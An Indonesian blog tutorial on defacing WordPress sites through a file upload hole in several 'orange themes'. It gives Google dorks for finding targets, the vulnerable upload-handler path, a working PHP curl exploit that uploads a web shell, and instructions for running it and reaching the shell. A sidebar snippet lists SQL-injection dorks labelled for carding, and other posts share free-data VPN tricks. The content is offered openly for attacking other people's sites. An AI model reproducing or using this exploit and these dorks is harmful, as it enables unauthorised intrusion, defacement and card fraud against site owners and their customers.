Skip to main content

Tutorial Deface Dengan Exploit orange themes File Upload

deface, hacking,Assalamualaikum , Karena sudah lama tidak share Tutorial karena saya Sekarang Sibuk dalam Bekerja , Kali ini saya dapat Kesempatan Untuk Membuat Tutor lagi :)

Alhamdulillah :D

Oke , tanpa basa-basi , langsung saja .

Pertama , Karena Judulnya orange themes File Upload , Maka ada beberapa Themes yang Sama Vuln dengan itu ,


  • inurl:"/wp-content/themes/bordeaux-theme/"
  • inurl:"/wp-content/themes/bulteno-theme/"
  • inurl:"/wp-content/themes/oxygen-theme/"
  • inurl:"/wp-content/themes/radial-theme/"
  • inurl:"/wp-content/themes/rayoflight-theme/"
  • inurl:"/wp-content/themes/reganto-theme/"
  • inurl:"/wp-content/themes/rockstar-theme/"  

 Sekarang , Gunakan 1 Dork Di atas .

Saya akan mengambil 1 Dork . 

Yaitu :inurl:"/wp-content/themes/bordeaux-theme/"

Lalu , Jika Sudah dapat kan target , ex: www.site.com/wp-content/themes/bordeux-theme/

Anda tambahkan Vuln nya , /functions/upload-handler.php

Maka targetnya akan menjadi www.site.com/wp-content/themes/bordeux-theme/functions/upload-handler.php

Jika Keluar Error maka Site Itu Vuln :D


nah Sebelum mengeksekusikan Target ini , yang anda butuh kan adalah :
  1. Xammp , Anda bisa download XAMMP di google, saya rasa sudah banyak bertebaran , lalu Install .
  2. Jika Sudah , Buka Folder Xammp > terus buka lagi Folder PHP , Dan cari code PHP.INI , Tekan Control + F / CTRL + F , Ketikkan curl Lalu enter , jika ketemu Delete (;) Tanpa tanda kurung () , Lalu Jika tidak menemukan tanda ; ini berarti kamu sudah succes ..
  3. Letakkan Shell Anda di Folder Xammp - Folder PHP , contoh Shell ex : up.php
Jika 3 cara diatas sudah selesai sekarang kita akan Mengeksekusikan Target ..

Copykan Exploit ini 
<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


Dan Save dengan extention .php , Disini saya akan save dengan File bernama x.php , Simpan di dekat Folder Xammp - Folder PHP ..
Tepat dimana anda letak Shell anda tadi ..

Ingat , nama shell saya ada up.php 
Maka di bagian exploit tadi 


$uploadfile="upload.php"; <-- upload.php rename menjadi up.php 

Jika sudah Save Kembali :))

Sekarang .

Buka Xammp Anda , Disini Jika xammp anda termasuk Versi lama , maka anda harus masuk ke folder xammp nya langsung 

Cara nya 

ketik : cd\ Lalu tekan Enter 
Lalu Jika CMD anda kembali ke System C atau seperti ini
C:\Documents and Settings\Alliance>cd\

C:\>
Maka sudah berhasil , Sekarang selanjutnya tekan cd /xammp/php tekan Enter
Jika Sudah Jlankan Exploitnya , tadi nama Exploit saya adalah x.php maka cara menjalankannya seperti ini ..
cd:\xammp\php\>: php x.php Dan tekan Enter ..
Jika Keluar tulisan nama shell anda di CMD atau Command Promd tadi maka SUCCES xD
Shell acces , www.site.com/wp-content/uploads/2013/11/up.php
Jika masih bingung , Kamu bisa Commentar di blog ini .
:)

Comments

Popular posts from this blog

Dord Carding 2014

inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview....

[Update 06-09-2016] Config open vpn sc three jabar only.

Assalamualaikum gan/sist kali ini saya akan share config open vpn update dari postingan sebelumnya. ga usah banya tanya lah langsung aja ini bukti konek. terus tanpa saweran juga pokonya tanpa pulsa tanpa kuota. hehehe Dan bukti kedua  Langsung saja saya kasih bahan sama Triknya untuk gratisan. Aplikasi Open Vpn Client Ambil Di Sini [Download]. Config Open Vpnya Ambil Di Sini [Download]. Tentunya Hp Android :v Jangan lupa sambil ngopi Jangan lupa juga mandi dulu :D Dan dua bahan tersebut harus di download soalnya kalo tanpa itu ga akan bisa gratisa. Ya segitu saja dari saya, semoga gratisanya di pergunakan dengan baik :D NOTE: Jika ada yang bingung atau mau bertanya silahkan hubungi saya via Facebook Thanks Wasalam.

Config Tri For Area Jabar Only

Assalamualaikum gan/sist, udah lama ga jumpa lagi, sorry banget ya saya jarang update tentang gratisan hehehe, bisa faktor kehidupan sibuk ckckck. udah lah jangan banyak ngomong langsung aja dah, nih bukti koneknya.   Tuh percaya kan heheheh . Ok dah, nih bahan bahanya. -Aplikasi OpenVpn ( Ambil di sini) -Config vpnya (Ambil Di sini )   -Kopi :V Syarat Untuk Memakai Config Di Atas. -Sc Tri Area Jawa Barat. -Tidak Perlu Sawe Alias 0p0k. -Yang Pasti Punya Androinya :v Note: Create Akun Vpnya Di Sini  Di Sebelah Sini  Masuk Pilih SG 2 UDP Bila Butuh Bantuan Kontak Saya Aja Via. Facebook  Thanks Semoga Lancar, Ingat Pergunakan Dengan Baik.